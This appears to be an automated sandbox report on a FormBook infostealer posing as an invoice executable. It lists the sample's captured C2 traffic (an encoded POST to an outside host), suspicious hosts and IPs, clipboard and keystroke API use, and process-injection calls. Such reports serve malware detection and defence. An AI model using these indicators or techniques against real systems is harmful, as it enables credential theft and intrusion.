                Source: unknownHTTP traffic detected: POST /79tr/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.beingandbecoming.ltdConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 208Cache-Control: no-cacheOrigin: http://www.beingandbecoming.ltdReferer: http://www.beingandbecoming.ltd/79tr/User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36Data Raw: 79 58 37 3d 69 44 51 55 32 4b 54 52 48 6b 51 49 38 74 32 63 56 55 6e 67 47 33 6d 37 43 62 68 33 39 57 50 49 52 36 32 77 2f 55 6d 4b 62 45 69 66 76 6f 5a 79 59 4b 38 48 38 56 68 6f 79 69 64 59 31 63 49 68 64 4c 41 6c 75 57 30 54 69 38 6e 55 65 58 70 51 59 62 39 4e 38 78 39 63 4b 43 4a 74 4b 59 44 50 42 6b 32 63 4d 37 79 68 34 65 55 52 36 2b 71 37 74 32 42 52 4a 48 63 50 4c 63 2f 36 73 38 34 71 6c 41 34 77 4f 6d 73 67 30 43 4a 79 51 4f 4d 63 6e 38 55 52 4d 69 52 56 4d 4f 41 44 4b 30 5a 67 57 35 2b 47 59 36 57 75 36 70 72 6d 2b 68 64 4b 79 4d 36 47 5a 72 64 34 38 62 72 4a 52 41 78 32 38 45 66 35 42 43 54 77 68 37 47 7a Data Ascii: yX7=iDQU2KTRHkQI8t2cVUngG3m7Cbh39WPIR62w/UmKbEifvoZyYK8H8VhoyidY1cIhdLAluW0Ti8nUeXpQYb9N8x9cKCJtKYDPBk2cM7yh4eUR6+q7t2BRJHcPLc/6s84qlA4wOmsg0CJyQOMcn8URMiRVMOADK0ZgW5+GY6Wu6prm+hdKyM6GZrd48brJRAx28Ef5BCTwh7Gz
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:45:35 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:45:38 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:45:40 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:45:43 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: tOxaspWNamv.exe, 0000000E.00000002.3408793565.0000000000DE4000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mcfunding.org
                Source: tOxaspWNamv.exe, 0000000E.00000002.3408793565.0000000000DE4000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mcfunding.org/0598/
                Source: ktmutil.exe, 0000000B.00000002.3412669118.0000000003BE4000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 0000000B.00000002.3414389532.0000000005FE0000.00000004.00000800.00020000.00000000.sdmp, tOxaspWNamv.exe, 0000000E.00000002.3409897296.0000000002A74000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2799096462.0000000017A24000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://34.92.79.175:19817
                Source: ktmutil.exe, 0000000B.00000003.2693767995.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: ktmutil.exe, 0000000B.00000003.2693767995.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: ktmutil.exe, 0000000B.00000003.2693767995.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: ktmutil.exe, 0000000B.00000003.2693767995.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: ktmutil.exe, 0000000B.00000003.2693767995.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: ktmutil.exe, 0000000B.00000003.2693767995.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: ktmutil.exe, 0000000B.00000003.2693767995.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: ktmutil.exe, 0000000B.00000002.3412669118.0000000003BE4000.00000004.10000000.00040000.00000000.sdmp, tOxaspWNamv.exe, 0000000E.00000002.3409897296.0000000002A74000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2799096462.0000000017A24000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?cf95fa39f4a72ce6b85bbfbe9eadb95a
                Source: ktmutil.exe, 0000000B.00000002.3402567248.0000000002D9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: ktmutil.exe, 0000000B.00000002.3402567248.0000000002D9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: ktmutil.exe, 0000000B.00000003.2689118508.0000000007A05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: ktmutil.exe, 0000000B.00000002.3402567248.0000000002D9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: ktmutil.exe, 0000000B.00000002.3402567248.0000000002D9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: ktmutil.exe, 0000000B.00000002.3402567248.0000000002D9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: ktmutil.exe, 0000000B.00000002.3402567248.0000000002D9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: ktmutil.exe, 0000000B.00000003.2693767995.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: ktmutil.exe, 0000000B.00000003.2693767995.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_00246B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,2_2_00246B0C
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_00246D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_00246D07
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_00246B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,2_2_00246B0C
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_00232B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,2_2_00232B37
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0025F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_0025F7FF

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.3408793565.0000000000D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2493193897.0000000002F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2493863404.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3397246670.0000000002780000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2492860834.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3409182554.0000000004790000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3409416368.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3409702511.0000000002EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: This is a third-party compiled AutoIt script.2_2_001F3D19
                Source: ORIGINAL INVOICE COAU7230734290.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: ORIGINAL INVOICE COAU7230734290.exe, 00000002.00000000.2140082625.000000000029E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f4950a80-c
                Source: ORIGINAL INVOICE COAU7230734290.exe, 00000002.00000000.2140082625.000000000029E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: "SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_266746b7-5
                Source: ORIGINAL INVOICE COAU7230734290.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_7c3df3d5-6
                Source: ORIGINAL INVOICE COAU7230734290.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_48c0b361-0
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: ORIGINAL INVOICE COAU7230734290.exe
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0042C883 NtClose,4_2_0042C883
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72B60 NtClose,LdrInitializeThunk,4_2_03A72B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_03A72DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_03A72C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A735C0 NtCreateMutant,LdrInitializeThunk,4_2_03A735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A74340 NtSetContextThread,4_2_03A74340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A74650 NtSuspendThread,4_2_03A74650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72BA0 NtEnumerateValueKey,4_2_03A72BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72B80 NtQueryInformationFile,4_2_03A72B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72BE0 NtQueryValueKey,4_2_03A72BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72BF0 NtAllocateVirtualMemory,4_2_03A72BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72AB0 NtWaitForSingleObject,4_2_03A72AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72AF0 NtWriteFile,4_2_03A72AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72AD0 NtReadFile,4_2_03A72AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72FA0 NtQuerySection,4_2_03A72FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72FB0 NtResumeThread,4_2_03A72FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72F90 NtProtectVirtualMemory,4_2_03A72F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72FE0 NtCreateFile,4_2_03A72FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72F30 NtCreateSection,4_2_03A72F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72F60 NtCreateProcessEx,4_2_03A72F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72EA0 NtAdjustPrivilegesToken,4_2_03A72EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72E80 NtReadVirtualMemory,4_2_03A72E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72EE0 NtQueueApcThread,4_2_03A72EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72E30 NtWriteVirtualMemory,4_2_03A72E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72DB0 NtEnumerateKey,4_2_03A72DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72DD0 NtDelayExecution,4_2_03A72DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72D30 NtUnmapViewOfSection,4_2_03A72D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72D00 NtSetInformationFile,4_2_03A72D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72D10 NtMapViewOfSection,4_2_03A72D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72CA0 NtQueryInformationToken,4_2_03A72CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72CF0 NtOpenProcess,4_2_03A72CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72CC0 NtQueryVirtualMemory,4_2_03A72CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72C00 NtQueryInformationProcess,4_2_03A72C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72C60 NtCreateKey,4_2_03A72C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A73090 NtSetValueKey,4_2_03A73090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A73010 NtOpenDirectoryObject,4_2_03A73010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A739B0 NtGetContextThread,4_2_03A739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A73D10 NtOpenProcessToken,4_2_03A73D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A73D70 NtOpenThread,4_2_03A73D70
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03244340 NtSetContextThread,LdrInitializeThunk,11_2_03244340
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03244650 NtSuspendThread,LdrInitializeThunk,11_2_03244650
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242B60 NtClose,LdrInitializeThunk,11_2_03242B60
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242BA0 NtEnumerateValueKey,LdrInitializeThunk,11_2_03242BA0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242BE0 NtQueryValueKey,LdrInitializeThunk,11_2_03242BE0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242BF0 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_03242BF0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242AF0 NtWriteFile,LdrInitializeThunk,11_2_03242AF0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242AD0 NtReadFile,LdrInitializeThunk,11_2_03242AD0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242F30 NtCreateSection,LdrInitializeThunk,11_2_03242F30
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242FB0 NtResumeThread,LdrInitializeThunk,11_2_03242FB0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242FE0 NtCreateFile,LdrInitializeThunk,11_2_03242FE0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242E80 NtReadVirtualMemory,LdrInitializeThunk,11_2_03242E80
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242EE0 NtQueueApcThread,LdrInitializeThunk,11_2_03242EE0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242D30 NtUnmapViewOfSection,LdrInitializeThunk,11_2_03242D30
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242D10 NtMapViewOfSection,LdrInitializeThunk,11_2_03242D10
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242DF0 NtQuerySystemInformation,LdrInitializeThunk,11_2_03242DF0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242DD0 NtDelayExecution,LdrInitializeThunk,11_2_03242DD0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242C60 NtCreateKey,LdrInitializeThunk,11_2_03242C60
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242C70 NtFreeVirtualMemory,LdrInitializeThunk,11_2_03242C70
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242CA0 NtQueryInformationToken,LdrInitializeThunk,11_2_03242CA0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032435C0 NtCreateMutant,LdrInitializeThunk,11_2_032435C0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032439B0 NtGetContextThread,LdrInitializeThunk,11_2_032439B0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242B80 NtQueryInformationFile,11_2_03242B80
